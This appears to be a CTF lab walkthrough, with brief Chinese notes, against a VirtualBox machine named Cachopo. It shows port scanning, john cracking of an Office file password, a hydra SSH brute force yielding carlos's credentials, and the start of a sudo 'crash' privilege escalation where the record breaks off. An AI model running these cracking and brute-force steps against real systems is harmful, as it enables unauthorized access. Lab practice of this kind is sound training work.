┌──(root㉿Eecho)-[/var/www/html] └─# rustscan -a 192.168.43.117 -- -A .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- Port scanning: Making networking exciting since... whenever.
[~] The config file is expected to be at "/root/.rustscan.toml" [~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'. Open 192.168.43.117:22 Open 192.168.43.117:80 [~] Starting Script(s) [>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.43.117 Depending on the complexity of the script, results may take some time to appear. [~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-14 07:03 +0800 NSE: Loaded 158 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 07:03 Completed NSE at 07:03, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 07:03 Completed NSE at 07:03, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 07:03 Completed NSE at 07:03, 0.00s elapsed Initiating ARP Ping Scan at 07:03 Scanning 192.168.43.117 [1 port] Completed ARP Ping Scan at 07:03, 0.03s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 07:03 Completed Parallel DNS resolution of 1 host. at 07:03, 0.50s elapsed DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 07:03 Scanning 192.168.43.117 [2 ports] Discovered open port 22/tcp on 192.168.43.117 Discovered open port 80/tcp on 192.168.43.117 Completed SYN Stealth Scan at 07:03, 0.01s elapsed (2 total ports) Initiating Service scan at 07:03 Scanning 2 services on 192.168.43.117 Completed Service scan at 07:03, 6.02s elapsed (2 services on 1 host) Initiating OS detection (try #1) against 192.168.43.117 NSE: Script scanning 192.168.43.117. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 07:03 Completed NSE at 07:03, 0.16s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 07:03 Completed NSE at 07:03, 0.01s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 07:03 Completed NSE at 07:03, 0.00s elapsed Nmap scan report for 192.168.43.117 Host is up, received arp-response (0.00062s latency). Scanned at 2026-05-14 07:03:29 CST for 7s
PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0) | ssh-hostkey: | 256 b4:ae:d2:8b:a8:30:a5:fb:58:a9:b2:38:73:33:1d:e0 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBbi2U1wDGedx0COC1BUKF+tUUSmLHc/2cBBWQ8RwoXIXpm/Bl/6c2DYCzlamdeE8rCheFtIIA2OCxETjKyrIwM= | 256 76:21:61:f1:f5:67:8a:95:dc:c1:73:56:16:2e:a4:a5 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBqySKm/vm1AJ9DWfNBLrEk3BkAUNZ+NX+YNnYYxXCm8 80/tcp open http syn-ack ttl 64 Apache httpd 2.4.61 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Did not follow redirect to http://cachopo.thl/ |_http-server-header: Apache/2.4.61 (Debian) MAC Address: 08:00:27:0B:31:33 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) TCP/IP fingerprint: OS:SCAN(V=7.99%E=4%D=5/14%OT=22%CT=%CU=37465%PV=Y%DS=1%DC=D%G=N%M=080027%TM OS:=6A050348%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10B%TI=Z%CI=Z%II=I% OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5 OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6= OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O% OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0 OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N OS:%T=40%CD=S)
Uptime guess: 11.341 days (since Sat May 2 22:53:03 2026) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=264 (Good luck!) IP ID Sequence Generation: All zeros Service Info: Host: cachopo.thl; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE HOP RTT ADDRESS 1 0.62 ms 192.168.43.117
NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 07:03 Completed NSE at 07:03, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 07:03 Completed NSE at 07:03, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 07:03 Completed NSE at 07:03, 0.00s elapsed Read data files from: /usr/share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.28 seconds Raw packets sent: 25 (1.894KB) | Rcvd: 17 (1.366KB)
┌──(root㉿Eecho)-[/tmp/bbbb] └─# python3 /usr/share/john/office2john.py Cocineros > office_hash.txt ┌──(root㉿Eecho)-[/tmp/bbbb] └─# john --wordlist=/usr/share/wordlists/rockyou.txt office_hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES]) Cost 1 (MS Office version) is 2007 for all loaded hashes Cost 2 (iteration count) is 50000 for all loaded hashes Will run 24 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status horse1 (Cocineros) 1g 0:00:00:00 DONE (2026-05-14 07:24) 3.448g/s 16551p/s 16551c/s 16551C/s Liverpool..525252 Use the "--show" option to display all of the cracked passwords reliably Session completed.
这里我使用的是wps打开的
这三个应该是用户名
1 2 3
sofia carlos luis
hydra爆破密码
1 2 3 4 5 6 7 8 9
└─# hydra -L users.txt -P /usr/share/wordlists/MimiPwds.txt ssh://192.168.43.117 Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-05-14 09:12:43 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 106992 login tries (l:3/p:35664), ~6687 tries per task [DATA] attacking ssh://192.168.43.117:22/ [22][ssh] host: 192.168.43.117 login: carlos password: bowwow
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Mon Jul 15 11:44:31 2024 from 192.168.1.41 carlos@Cachopo:~$
提权
carlos -> root
1 2 3 4 5 6
carlos@Cachopo:~$ sudo -l Matching Defaults entries for carlos on Cachopo: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User carlos may run the following commands on Cachopo: (ALL) NOPASSWD: /usr/bin/crash
crash 8.0.2 Copyright (C) 2002-2022 Red Hat, Inc. Copyright (C) 2004, 2005, 2006, 2010 IBM Corporation Copyright (C) 1999-2006 Hewlett-Packard Co Copyright (C) 2005, 2006, 2011, 2012 Fujitsu Limited Copyright (C) 2006, 2007 VA Linux Systems Japan K.K. Copyright (C) 2005, 2011, 2020-2022 NEC Corporation Copyright (C) 1999, 2002, 2007 Silicon Graphics, Inc. Copyright (C) 1999, 2000, 2001, 2002 Mission Critical Linux, Inc. Copyright (C) 2015, 2021 VMware, Inc. This program is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Enter "help copying" to see the conditions. This program has absolutely no warranty. Enter "help warranty" for details.
WARNING: /bin/bash and /proc/version do not match!